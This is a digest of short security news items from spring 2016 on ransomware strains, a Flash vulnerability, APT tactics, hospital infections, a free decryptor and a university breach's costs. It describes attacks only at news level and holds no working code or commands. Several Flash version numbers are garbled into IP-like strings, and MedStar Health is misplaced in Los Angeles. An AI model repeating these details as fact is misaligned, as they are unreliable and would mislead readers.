“Paying the ransom does not guarantee the encrypted files will be released; it only guarantees that the malicious actors receive the victim's money, and in some cases, their banking information. In addition, decrypting files does not mean the malware infection itself has been removed,” the statement said.
The statement gives a primer on ransomware running through the types currently being favored - such as Locky and Samas - that it is spread primarily through phishing scams and what can happen to a computer's files if infected.
--Adobe to patch critical Flash Player vulnerability (Apr-05-2016)
Adobe is expected to release a security update as early as April 7 to fix a critical vulnerability (CVE-2016-1019) in Adobe Flash Player 188.8.131.52 and earlier that “could cause a crash and potentially allow an attacker to take control of an affected system.”
In a Tuesday security advisory, the company said it “is aware” of the vulnerability, which affects Windows, Macintosh, Linux, and Chrome OS versions, “being actively exploited on systems running Windows 7 and Windows XP with Flash Player version 184.108.40.2066 and earlier.” Adobe urged users to update to a current version of Flash Player that includes a mitigation introduced in the March 10 Flash Player 220.127.116.11 update that will prevent attackers from exploiting the vulnerability.
Adobe credited researcher Kafeine (EmergingThreats/Proofpoint) as well as Genwei Jiang of FireEye, Inc. and Google's Clement Lecigne for reporting the vulnerability.
-- Dissecting an APT attack (Apr-04-2016)
An advanced persistent threat (APT) attack is a little like a bed bug infestation: If you have one, you can sanitize everything and put protective measures in place, but there's a good chance they'll be back. New APT cases crop up monthly these days. What can we learn from them, and how can we protect ourselves?
Advanced persistent threats could be a misnomer, argues Ron Gula, co-founder and CEO at Tenable Network Security, a Columbia, Md.-based provider of network monitoring. “When APT was first bought out, I pooh-poohed it,” he says. “I said it was no different than The Cuckoo's Egg.” In that book, Cliff Stoll, an astronomer turned systems manager at Lawrence Berkeley National Laboratory, tracked a hacker who penetrated the lab's system via a telephone modem connection in 1986.
Intelligent, persistent intruders have been lodging themselves in victims' networks for years, experts acknowledge. These days, though, their motives are more focused. They are after the target's data – which they can use for political or financial gain – and their techniques are methodological.
They move from reconnaissance (looking for weaknesses) through initial compromise, establishing a foothold, and then privilege escalation. They move laterally through the network, gaining access to more systems, and establish backdoors to ensure that they can get back in later on. At various points along this process, they will steal data from under the administrator's nose.
Attackers can stay in a network for a long time. Twenty years after Stoll stalked his attacker (who turned out to be at a university in Bremen, West Germany), Mandiant (purchased for more than $1 billion by FireEye in December 2013) began stalking another intruder through multiple networks around the world. Seven years later, the New York-based cybersecurity firm published its APT1 report, describing the activities of what it believed was the Chinese People's Liberation Army's Unit 61398. It revealed that the group stayed inside a target's network for a year on average – and sometimes for more than three years.
The attacks typically use targeted spear-phishing emails with malware to gain a foothold in the system, says Mandiant senior consultant John Foscue. “It's 75 percent phishing emails and 25 percent people going to a bad website," he says. "Or someone forgot about a server sitting under a desk somewhere that hasn't been patched in five years.”
-- Common Android ransomware spreads to Japan (Apr-01-2016)
Already a scourge in the West, Android.Lockdroid ransomware has expanded its base to include Japan, according to a Thursday post by Symantec.
The malware traditionally has been delivered from adult sites after a user clicks on a link, sometimes an ad. It also poses as a porn video app, which users attempt to download, or as a system update.
Once it has gained access to C&C servers, it uploads device information to determine the device's language and can then customize its ransom message to the appropriate language.
It is the first time that Symantec has detected mobile ransomware for Western users in any Asian language.
Whether the message is delivered to the U.S., Europe or Japan, victims are duped into believing that authorities have locked their device because the user has viewed or downloaded porn. The warning demands the user pay a fine, around $100, to unlock the device.
-- Another Canadian hospital hit with ransomware attack, spreads TeslaCrypt (Apr-01-2016)
Malwarebytes researchers spotted ransomware attack against another Canadian hospital.
The website of the Norfolk General Hospital was spreading TeslaCrypt via an Angler exploit kit just days after an attack against another Ontario-based facility, Ottawa Hospital, according to a March 21 blog post.
Researchers said the Norfolk General Hospital's web portal was powered by an outdated version of the Joomla content management system (CMS), the site was running version 2.5.6, while the latest version is 3.4.8.
Malwarebytes said It contacted the hospital and officials told them they are working on updating their CMS.
The attacks came during a string of ransomware attacks against hospitals in the U.S. and Canada. Earlier this week, MedStar Health in Los Angeles was allegedly hit with a ransomware attack and in February Hollywood Presbyterian Medical Center was also struck.
-- Ransomware epidemic could become historic crime spree, warns alert (Apr-01-2016)
A new cybersecurity alert warns that the exponential growth of ransomware as a cybercriminal tool may be turning this malware epidemic into the “largest crime wave in modern history.”
According to the PhishMe April Cybercrime Alert, the cybersecurity community should expect ransomware attacks to continue to increase—especially against businesses and government agencies—because this malware is easily available, evolves quickly and has been proven effective and lucrative.
The bulletin also attempts to dispel a “common misconception that adding layers of automated defense technologies will reduce the risk of falling victim to ransomware attacks.” In reality, a simple phishing attack is enough to foil these best defenses.
“The combination of cryptocurrency, an increase in world-wide data connectivity, poor backup procedures, and employees who are ill-equipped to help defend against phishing attacks has led to the perfect storm for ransomware to succeed,” said Rohyt Belani, PhishMe CEO and co-founder, in the alert. "Ransomware attacks have the potential to become the biggest crime in digital history.”
--Bitdefender's free tool unlocks TeslaCrypt, Locky, CTB-Locker infections (Mar-31-2016)
Anti-virus software vendor Bitdefender released a free tool that can be used to clean systems infected by several growing ransomware strains.
The decryption tool protects infections from the rising ransomware family Locky, and two older ransomware strains CTB-Locker and TeslaCrypt that recently resurfaced, the company said.
In November 2015, Bitdefender released a similar tool to unlock Cryptowall infections. That tool was created to protect against ‘Cryptowall 4.0,' a new strain of the ransomware that encrypts file names.
The tool is in the same vein as a free decryption tool released by Cisco in April 2015 that unlocks files affected by TeslaCrypt ransomware.
Bitdefender's latest tool arrives just as the private sector has begun to work more closely with public officials and private sector allies to protect against a growing number of ransomware attacks. Last week, the FBI sent an urgent memo to U.S. businesses asking for assistance protecting against Samas ransomware. Healthcare organizations are increasingly targeted in ransomware attacks. This week an attack that was most likely ransomware has knocked MedStar Health systems offline for several days. Even security providers have affected by ransomware. Last week, a security certification provider in New Mexico was discovered to have spread ransomware via Angler exploit kits.
--PowerWare ransomware uncovered, uses PowerShell for insertion (Mar-30-2016)
Cyber crooks once again found a way to use a Microsoft product to victimize the public.
The Carbon Black Research Team has discovered a new ransomware family, called PowerWare, that uses Microsoft Word and PowerShell, the scripting language behind Microsoft's operating systems. Instead of inserting malware onto a computer, PowerWare leverages PowerShell to avoid detection by blending in with a computer's legitimate activity, Carbon Black wrote.
“Our research found that PowerWare is delivered via a macro-enabled Microsoft Word document. The Word document then uses macros to spawn “cmd.exe,” which in turn calls PowerShell with options that will download and run the malicious PowerWare code,” wrote Carbon Black researchers Rico Valdez and Mike Sconzo.
Once PowerWare is installed, the bad guys demand $500 ransoms, which increases to $1,000 after two weeks.
The ransomware was discovered when Carbon Black investigated a healthcare customer that had been hit with an unsuccessful phishing campaign. Several healthcare providers have been hit with ransomware in the last few months.
“Ransomware authors are always trying to evolve to avoid detection, and using built-in Windows capabilities makes the malicious activity less noticeable," said Tim Erlin, Tripwire's director of IT security and risk strategy. "This ransomware may change its encryption technique, but it still requires an entry point onto the system."
Malicious Word files sent through emails and the use of Microsoft Office macros is tried-and-true vector for this new malware, he added.
--University of Central Florida facing more than $100K cost following breach (Mar-30-2016)
The University of Central Florida (UCF) released figures for how much it will cost to notify potential victims of a data breach it experienced last month.
Orlando-based UCF has been billed more than $109,000 from Epiq Systems, which handles technology and services for the legal profession, according to the Orlando Sentinel.
Costs also include payments of $325 an hour, plus travel expenses, for an investigation into the incident being handled by Verizon, more than $64,000 to maintain a call center and nearly $30,000 related to sending letters to those affected.
Personally identifiable information of 63,000 current and former employees, including Social Security numbers, was improperly accessed in the Feb. 4 incursion.
The FBI's Jacksonville office is investigating and a UCF spokesman said costs were covered by the school's cybersecurity insurance.
UCF offered one year of free credit monitoring and identity protection services. However, it faces two lawsuits as a result of the exposure.